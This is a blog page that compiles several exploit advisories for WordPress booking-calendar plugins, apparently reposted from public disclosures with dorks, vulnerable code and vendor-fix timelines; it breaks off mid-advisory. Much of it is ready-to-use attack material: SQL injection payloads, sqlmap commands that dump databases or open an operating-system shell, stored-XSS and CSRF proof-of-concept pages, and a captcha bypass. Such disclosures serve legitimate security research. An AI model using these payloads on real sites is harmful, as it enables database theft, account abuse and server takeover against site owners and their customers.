# Exploit Title: WordPress appointment-booking-calendar <=1.1.23 - Shortcode SQL injection
# Date: 2016-01-24
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
# Exploit Author: Joaquin Ramirez Martinez [i0 security-lab]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.1.23
# OWASP Top10: A1-Injection
# Tested on: windows 10 + firefox + sqlmap 1.0.
===================
PRODUCT DESCRIPTION
===================
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in
a calendar**. The booking form is linked to a **PayPal** payment process.
You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings
that can be accepted for each time-slot."
(copy of readme file)
======================
EXPLOITATION TECHNIQUE
======================
remote
==============
SEVERITY LEVEL
==============
critical
================================
TECHNICAL DETAILS && DESCRIPTION
================================
A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.20.
The flaw was found in the function to run when a shortcode is found within a page in the wordpress site.
The function mentioned use unsanitized attributes and a user authenticated as a editor, autor or
administrator (compromised) can exploit this vulnerability by adding crafted shortcodes on a page or post.
The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw,
an attacker can compromise the entire web server.
================
PROOF OF CONCEPT
================
An attacker(editor, autor or administrator) can embed into a post the following shortcode...
[CPABC_APPOINTMENT_LIST calendar="-1 or sleep(10)#"]
... and the post will take ten seconds loading.
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
strparser[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
========
TIMELINE
========
2016-01-08 vulnerability discovered
2016-01-24 reported to vendor
2016-01-25 released appointment-booking-calendar 1.1.24
2016-01-26 full disclosure
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863147342
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox.
==============
Description
==============
Create a booking form with a reservation calendar or a classic contact form, connected to
a PayPal payment button.
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.
The **reservation calendar** is an optional item, so it can be disabled to create a **general
purpose contact form**.
There are two types of bookings available in the calendar configuration: full day bookings or
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial
day bookings the start and end dates are partially blocked as used for example in
**room/hotel bookings**.
===================
Technical details
===================
Booking calendar plugin is prone to a blind sql injection because fails to sanitize a
parameter used into a sql statement.
The function ´dex_bccf_get_option´ uses a variable called ´CP_BCCF_CALENDAR_ID´ which is not sanitized
and is used as value for the ´id´ of sql parameter.
The vulnerable function is called into many other functions, and one of those is ´dex_bccf_calendar_load2´
which sets the ´CP_BCCF_CALENDAR_ID´ with the following code:
""
$calid = str_replace(TDE_BCCFCAL_PREFIX, "", @$_GET["id"]);
if (!defined('CP_BCCF_CALENDAR_ID') && $calid != '-1')
define('CP_BCCF_CALENDAR_ID', $calid);
""
and then the function ´dex_bccf_get_option´ is called into ´dex_bccf_calendar_load2´ function:
"" ...
$option = dex_bccf_get_option('calendar_overlapped', DEX_BCCF_DEFAULT_CALENDAR_OVERLAPPED);
...
""
The ´dex_bccf_calendar_load2´ function is called when we request the next url:
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent
&dex_bccf_calendar_load2=list&id=<SQLI commands>
A malicious unauthenticated user can exploit the sql injection and obtain all records from database.
==================
Proof of concept
==================
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent
&dex_bccf_calendar_load2=list&id=1%20and%20sleep(10)
###############################################################################
# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox.
==============
Description
==============
Create a booking form with a reservation calendar or a classic contact form, connected to
a PayPal payment button.
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.
The **reservation calendar** is an optional item, so it can be disabled to create a **general
purpose contact form**.
There are two types of bookings available in the calendar configuration: full day bookings or
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial
day bookings the start and end dates are partially blocked as used for example in
**room/hotel bookings**.
===================
Technical details
===================
Booking calendar plugin is prone to a blind sql injection in the shortcode function ´dex_bccf_filter_content´
because there is not sanitization when the variable ´DEX_BCCF_CALENDAR_FIXED_ID´ is asigned and then is used
into function ´dex_bccf_get_public_form()´.
function dex_bccf_filter_content($atts) {
...
extract(shortcode_atts(array(
'calendar' => '',
'user' => '',
), $atts));
if ($calendar != '')
define('DEX_BCCF_CALENDAR_FIXED_ID', $calendar);
..
return $buffered_contents;
}
function dex_bccf_get_public_form() {
global $wpdb;
if (defined('DEX_CALENDAR_USER') && DEX_CALENDAR_USER != 0)
$myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE conwer=" . DEX_CALENDAR_USER);
else if (defined('DEX_BCCF_CALENDAR_FIXED_ID'))
$myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE id=" . DEX_BCCF_CALENDAR_FIXED_ID);
else
$myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME);
...
}
==================
Proof of concept
==================
An editor/author can add a ahortcode with his sql command into a post:
[CP_BCCF_FORM calendar=-1 or sleep(10)#]
###############################################################################
# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Privilege escalation / stored XSS vulnerabilities
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox.
==============
Description
==============
Create a booking form with a reservation calendar or a classic contact form, connected to
a PayPal payment button.
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.
The **reservation calendar** is an optional item, so it can be disabled to create a **general
purpose contact form**.
There are two types of bookings available in the calendar configuration: full day bookings or
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial
day bookings the start and end dates are partially blocked as used for example in
**room/hotel bookings**.
===================
Technical details
===================
Booking calendar contact form plugin for wordpress is prone to multiple privilege escalation and stored XSS
vulnerabilities because does not verify if a user that make a request for update the plugin options,
add or delete a ´season price´ and add/delete/update an item to booking list is a privileged user and does not
sanitize the supplied information.
An authenticated user can exploit these vulnerabilities.
==================
Proof of concept
==================
1) Add a ´season price´ with XSS Payload in parameter ´price´.
http://<wp-path>/<ap-path>/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices
&add=1&dex_item=1&price=%3E%22%3Cimg%20src=x%20onerror=alert(/u_r_owned/)%3E%22%3C&dfrom=&dto
2) Delete a ´season price´ with specified ´code´
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data
&dex_bccf=loadseasonprices&delete=1&code=1
3) Own a calendars if you have an account like ´suscriptor´ role and inject a XSS payload into ´name parameter´:
http://<wp-hots>/<wp-path>/wp-admin/admin.php?page=dex_bccf.php&u=<my user id>&public=1&owner=1&name=<XSS payload>
4) Update charset of booking calendar tables:
http://<wp-host>/<wp-path>/wp-admin/admin.php?page=dex_bccf.php&ac=st&chs=<my supplied charset>
5) Delete a booking calendar item if you are logged in as suscriptor:
http://localhost/wordpress/wp-admin/admin.php?page=dex_bccf.php&cal=1&list=1&ld=<id of calendar to delete>
6) Unrestricted update options / stored XSS in some parameters ( PoC html )
<html>
<!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin
email_confirmation_to_user,calendar_language,calendar_mode,calendar_pages,currency,cv_text_enter_valid_captcha
and other parameters are vulnerables to stored XSS
url_ok,url_cancel can be used to redirect a user and make fishing attacks
´dex_item´ value is the ´id´ of the calendar.
-->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:80/wordpress/wp-admin/admin.php?page=dex_bccf.php&cal=1&r=0.5076911114737157", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
xhr.withCredentials = true;
var body = "dex_bccf_post_options=1&dex_item=1&calendar_enabled=true&selDay_startcal1=&selMonth_startcal1=&selYear_startcal1=&selDay_endcal1=&selMonth_endcal1=&selYear_endcal1=\">\"<img><\"&calendar_pages=2&calendar_language=\">\"<img><\"&calendar_weekday=0&calendar_dateformat=0&calendar_overlapped=false&calendar_showcost=1&calendar_mode=\">\"<img><\"&calendar_mindate=today&calendar_maxdate=\">\"<img><\"&calendar_minnights=%22%3E%22%3Cimg%3E%3C%22&calendar_maxnights=%22%3E%22%3Cimg%3E%3C%22&wd1=1&wd2=1&wd3=1&wd4=1&wd5=1&wd6=1&wd7=1&sd1=1&sd2=1&sd3=1&sd4=1&sd5=1&sd6=1&sd7=1&calendar_fixedreslength=1&calendar_holidays=&calendar_startres=¤cy=%22%3E%22%3Cimg%3E%3C%22&request_cost=%22%3E%22%3Cimg%3E%3C%22&max_slots=0&calendar_suplementminnight=%22%3E%22%3Cimg%3E%3C%22&calendar_suplementmaxnight=%22%3E%22%3Cimg%3E%3C%22&calendar_suplement=%22%3E%22%3Cimg%3E%3C%22&calendar_depositenable=0&calendar_depositamount=0&calendar_deposittype=0&dex_dc_price=%22%3E%22%3Cimg%3E%3C%22&dex_dc_season_dfrom=%22%3E%22%3Cimg%3E%3C%22&dex_dc_season_dto=%22%3E%22%3Cimg%3E%3C%22&paypal_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&paypal_product_name=%22%3E%22%3Cimg%3E%3C%22&url_ok=http%3A%2F%2Flocalhost%2Fwordpress&url_cancel=http%3A%2F%2Flocalhost%2Fwordpress&paypal_language=%22%3E%22%3Cimg%3E%3C%22&request_taxes=%22%3E%22%3Cimg%3E%3C%22&form_structure=%5B%5B%7B%22name%22%3A%22email%22%2C%22index%22%3A0%2C%22title%22%3A%22Email%22%2C%22ftype%22%3A%22femail%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22required%22%3Atrue%2C%22predefined%22%3A%22%22%2C%22size%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22subject%22%2C%22index%22%3A1%2C%22title%22%3A%22Subject%22%2C%22required%22%3Atrue%2C%22ftype%22%3A%22ftext%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22predefined%22%3A%22%22%2C%22size%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22message%22%2C%22index%22%3A2%2C%22size%22%3A%22large%22%2C%22required%22%3Atrue%2C%22title%22%3A%22Message%22%2C%22ftype%22%3A%22ftextarea%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22predefined%22%3A%22%22%7D%5D%2C%5B%7B%22title%22%3A%22%22%2C%22description%22%3A%22%22%2C%22formlayout%22%3A%22top_aligned%22%7D%5D%5D&sTitle=Email&sShortlabel=&sNametag=%3C%25email%25%3E&sName=email&sSize=medium&sRequired=on&sEqualTo=&sPredefined=&sUserhelp=&sCsslayout=&vs_text_submitbtn=%22%3E%22%3Cimg%3E%3C%22&vs_text_previousbtn=%22%3E%22%3Cimg%3E%3C%22&vs_text_nextbtn=%22%3E%22%3Cimg%3E%3C%22&vs_use_validation=DEX_BCCF_DEFAULT_vs_use_validation&vs_text_is_required=This+field+is+required.&vs_text_is_email=%22%3E%22%3Cimg%3E%3C%22%40mail.com&cv_text_enter_valid_captcha=Please+enter+a+valid+captcha+code.&vs_text_datemmddyyyy=%22%3E%22%3Cimg%3E%3C%22&vs_text_dateddmmyyyy=%22%3E%22%3Cimg%3E%3C%22&vs_text_number=%22%3E%22%3Cimg%3E%3C%22&vs_text_digits=%22%3E%22%3Cimg%3E%3C%22&vs_text_max=%22%3E%22%3Cimg%3E%3C%22&vs_text_min=%22%3E%22%3Cimg%3E%3C%22&cp_cal_checkboxes_type1=0&cp_cal_checkboxes1=¬ification_from_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com¬ification_destination_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&email_subject_notification_to_admin=%22%3E%22%3Cimg%3E%3C%22&email_notification_to_admin=New+reservation+made+with+the+following+information%3A%0D%0A%0D%0A%22%3E%22%3Cimg%3E%3C%22%0D%0A%0D%0ABest+regards.&cu_user_email_field=email&email_subject_confirmation_to_user=%22%3E%22%3Cimg%3E%3C%22&email_confirmation_to_user=We+have+received+your+request+with+the+following+information%3A%0D%0A%0D%0A%25INFORMATION%25%0D%0A%0D%0A%22%3E%22%3Cimg%3E%3C%22%0D%0A%0D%0ABest+regards.&dexcv_enable_captcha=true&dexcv_width=%22%3E%22%3Cimg%3E%3C%22&dexcv_height=%22%3E%22%3Cimg%3E%3C%22&dexcv_chars=%22%3E%22%3Cimg%3E%3C%22&dexcv_min_font_size=%22%3E%22%3Cimg%3E%3C%22&dexcv_max_font_size=%22%3E%22%3Cimg%3E%3C%22&dexcv_noise=%22%3E%22%3Cimg%3E%3C%22&dexcv_noise_length=%22%3E%22%3Cimg%3E%3C%22&dexcv_background=%22%3E%22%3Cimg%3E%3C%22&dexcv_border=%22%3E%22%3Cimg%3E%3C%22&dexcv_font=font-1.ttf&submit=Save+Changes";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
========
TIMELINE
========
2016-02-01 vulnerability discovered
2016-02-05 reported to vendor
2016-02-08 released fixed plugin v1.0.24
2016-02-08 public disclosure
# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2[Multiple
vulnerabilities]
# Date: 2015-05-01
# Google Dork: Index of
/wordpress/wp-content/plugins/booking-calendar-contact-form/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link:
http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.0.2
# OWASP Top10: A1-Injection
# Tested on: windows 7 ultimate + firefox + sqlmap 0.9.
============================================
* Authenticated SQL injection
============================================
========================
Description
========================
In a site that has installed the plugin vulnerable and an attacker who has
an account
editor privileges can exploit the flaw SQL injection and possibly escalate
their privileges.
========================
Vulnerability
========================
vulnerable function code is located in dex_bcf.php
function dex_bccf_load_season_prices() {
global $wpdb;
if ( ! current_user_can('edit_pages') )
{
echo 'No enough privilegies to load this content.';
exit;
}
if (!defined('CP_BCCF_CALENDAR_ID'))
define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]);
//.....vulnerable line
$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.CP_BCCF_CALENDAR_ID);
$maxcosts = 0;
...
if (count ($codes))
{
... //Print results [bueno para seleccion mediante UNION]
foreach ($codes as $value)
{
echo '<tr>';
$price = explode(';',$value->price);
echo '<td>'.$price[0].'</td>';
for ($k=1; $k<=$maxcosts; $k++)
echo '<td>'.@$price[$k].'</td>';
echo '<td>'.substr($value->date_from,0,10).'</td>';
echo '<td>'.substr($value->date_to,0,10).'</td>';
echo '<td>[<a
href="javascript:dex_delete_season_price('.$value->id.')">Delete</a>]</td>';
echo '</tr>';
}
...
}
======================
Injection
======================
the following urls can be used to inject code.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
------------------------
GET parameter vulnerable
------------------------
dex_item
========================
injection techniques:
========================
-> UNION BASED
-> TIME BASED BLIND
=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------
python sqlmap.py --url="
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
"
-p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE"
--dbms="mysql" --dbs
====================================================
=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_delete($ret) {
global $wpdb;
$wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where
id=".esc_sql($_POST["id"]) );
return $ret;
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
------------------------
POST parameter vulnerable
------------------------
id
========================
injection techniques:
========================
-> TIME BASED BLIND
=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------
python sqlmap.py --url="
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
"
--data="id=1" -p id --level=5 --risk=3
--cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T
====================================================
* Authenticated SQL injection
====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_update($ret) {
global $wpdb;
dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin",
"varchar(10) DEFAULT '0' NOT NULL");
dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color",
"varchar(10)");
$wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set
title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."'
where id=".esc_sql($_POST["id"]) );
return $ret;
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
------------------------
POST parameter vulnerable
------------------------
id
========================
injection techniques:
========================
-> BLIND
=======================
POC
=======================
(modifing all rows with "i0akiN" value and sleeping 5 seconds)
url
-------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
----------
post data
----------
id=0 or 1=1 AND SLEEP(5) -- -
&tile=i0akiN&description=i0akiN&color=i0akiN
=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_add($ret) {
global $wpdb;
$calid = str_replace (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]);
...
$wpdb->query("insert into
".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color)
".
"
values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','"
.esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')");
..
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi]
========================
injection techniques:
========================
-> Insertion data
=======================
POC
=======================
Insert a row into wp_bccf_reservation_calendars_data table without use
other post parameters
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&
id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- -
====================================================
* Unauthenticated SQL injection
====================================================
=======================
Description
=======================
An attacker without autorization can send modified requests to database and
sensitive information
that can use for escalate privilegies and more...
======================
Vulnerability
======================
vulnerable function code is located in dex_bcf.php
function dex_bccf_caculate_price($startday, $enddate, $calendar,
$default_price) {
...
//$calendar is not sanitized in sql query
$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.$calendar);
$mode =
(dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) ==
'false');
while (
(($enddate>$startday) && !$mode) ||
(($enddate>=$startday) && $mode)
)
{
$daily_price = $default_price;
$sprice = array();
foreach ($codes as $value)
{
$sfrom = strtotime($value->date_from);
$sto = strtotime($value->date_to);
if ($startday >= $sfrom && $startday <= $sto)
{
$sprice = explode (';', $value->price);
$daily_price = $sprice[0];
}
}
$season_prices[] = $sprice;
$price += $daily_price;
$startday = strtotime (date("Y-m-d", $startday)." +1 day");
//60*60*24;
$days++;
}
...
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost
------------------------
post variable vulnerable
------------------------
dex_item=1
========================
injection techniques:
========================
-> UNION BASED <- yeaahh!!
-> TIME BASED BLIND
-> BOOLEAN BASED BLIND
========================
POC
========================
Obtaining all available databases from mysql server with sqlmap.
python sqlmap.py --url="
http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost
"
--data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs
--tecnique U
===========================================================
============================================================
* Unauthenticated SQL injection 2
============================================================
========================
Description
========================
The following function is also vulnerable to SQL injection because usually
the variable
CP_BCCF_CALENDAR_ID it equals the content of POST ['dex_item'] or GET
['dex_item'] Besides this function is used in several places
the code.
========================
Vulnerability
========================
Vulnerable function:
function dex_bccf_get_option ($field, $default_value)
{
global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
if (!defined("CP_BCCF_CALENDAR_ID"))
return $default_value;
if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID)
$value = @$dex_option_buffered_item->$field;
else
{
//....vulnerable line
$myrows = $wpdb->get_results( "SELECT * FROM
".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID );
$value = @$myrows[0]->$field;
$dex_option_buffered_item = $myrows[0];
$dex_option_buffered_id = CP_BCCF_CALENDAR_ID;
}
if ($value == '' && $dex_option_buffered_item->calendar_language == '')
$value = $default_value;
return $value;
}
##########################################
======================================
* CAPTCHA BYPASS & ROW INSERTION
======================================
==============
DESCRIPTION
==============
An attacker can manipulate some variables for bypass conditional staments.
For example: insert unlimited rows into
table (could use a program)
=============
... HOW?
=============
An attacker encodes parameter GET['hdcaptcha_dex_bccf_post'] to MD5
encryption saving into value of
"rand_code" cookie.
==========
POC
==========
REQUEST
-----------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1&
dex_item=1&
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&
hdcaptcha_dex_bccf_post=1&dex_item=1&hdcaptcha_dex_bccf_post=joaquin
^
-------------- |
POST VARIABLES
--------------
hdcaptcha_dex_bccf_post=1
-------
COOKIES
-------
rand_code=a6beca7f198112079f836a4e67cf4821 <---joaquin MD5 encrypted
===========================
VULNERABLE FUNCTION CODE
==========================
function dex_bccf_check_posted_data(){
....
if (!isset($_GET['hdcaptcha_dex_bccf_post'])
||$_GET['hdcaptcha_dex_bccf_post'] == '') $_GET['hdcaptcha_dex_bccf_post']
= @$_POST['hdcaptcha_dex_bccf_post'];
if (
(dex_bccf_get_option('dexcv_enable_captcha',
TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') &&
( (strtolower($_GET['hdcaptcha_dex_bccf_post']) !=
strtolower($_SESSION['rand_code'])) ||
($_SESSION['rand_code'] == '')
)
&&
( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) !=
($_COOKIE['rand_code'])) ||
($_COOKIE['rand_code'] == '')
)
)
{
$_SESSION['rand_code'] = '';
echo 'captchafailed';
exit;
}
// if this isn't the real post (it was the captcha verification) then echo
ok and exit
if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset(
$_POST['dex_bccf_post'] ) )
{
echo 'ok';
exit;
}
...
}
###########################################
=======================================
* Persistent JS/HTML code injection
=======================================
========================
Description:
========================
Un atacante sin autenticacion puede inyectar codigo malicioso que podria
ejecutar el navegador
de la victima(could be an administrator). Cuando la victima visite la
pagina modificada, el atacante
podria robar datos y/o controlar las acciones de la victima de forma remota.
========================
Vulnerability
========================
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data
POST-DATA
dex_item=2
dex_bccf_post_options=1
email_confirmation_to_user=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
%3Ctextarea%3E
email_notification_to_admin=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
%3Ctextarea%3E
Parameters email_confirmation_to_user,email_notification_to_admin not
filtered and is included in admin page
====================
VULNERABLE FUNCTION
====================
dex_bccf_save_options() located in dex_bccf.php
save unfiltered post data
#########################################
# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability
# Date: 2018-12-28
# Exploit Author: B0UG
# Vendor Homepage: https://wpbookingcalendar.com/
# Software Link: https://wordpress.org/plugins/booking/
# Version: Tested on version 8.4.3 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-20556
#I. VULNERABILITY
Authenticated SQL Injection
#II. BACKGROUND
'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations.
#III. DESCRIPTION
An authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database.
#IV. PROOF OF CONCEPT
1) Access WordPress control panel.
2) Navigate to the Booking Calendar plugin page.
3) Set up Burp Suite to capture the traffic.
4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry.
5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'.
6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection:
• Boolean based blind injection
• Error based injection
• Time based injection
7) We can perform a time based SQL injection by appending ) AND SLEEP(100) AND (1=1 after the ID value in the parameter as shown below.
action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67
Obtaining a shell using sqlmap
-----------------------
• Obtain a SQL Shell
Sqlmap –r post-request.txt –p booking_id --sql-shell
• Obtain a Linux Shell
Sqlmap –r post-request.txt –p booking_id --os-shell
• Obtain a Windows Command Prompt
Sqlmap –r post-request.txt –p booking_id --os-cmd
#V. IMPACT
The vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability.
#VI. SYSTEMS AFFECTED
WordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected).
#VII. REMEDIATION
Uninstall the plugin until the vulnerability has been fixed by the developer.
#VIII. DISCLOSURE TIMELINE
#December 28, 2018 1: Vulnerability identified.
#December 28, 2018 2: Informed developer of the vulnerability.
#February 14, 2019 3: No communication received back from the developer.
SQL injection vulnerability in Booking Calendar WordPress Plugin
Abstract
An SQL injection vulnerability exists in the Booking Calendar WordPress plugin. This vulnerability allows an attacker to view data from the database. The affected parameter is not properly sanitized or protected with an anti-Cross-Site Request Forgery token. Consequently, it can (also be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement).
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160714-0002
Tested versions
These issues were successfully tested on Booking Calendar WordPress Plugin version 6.2.
Fix
This issue is resolved in Booking Calendar version 6.2.1.
Introduction
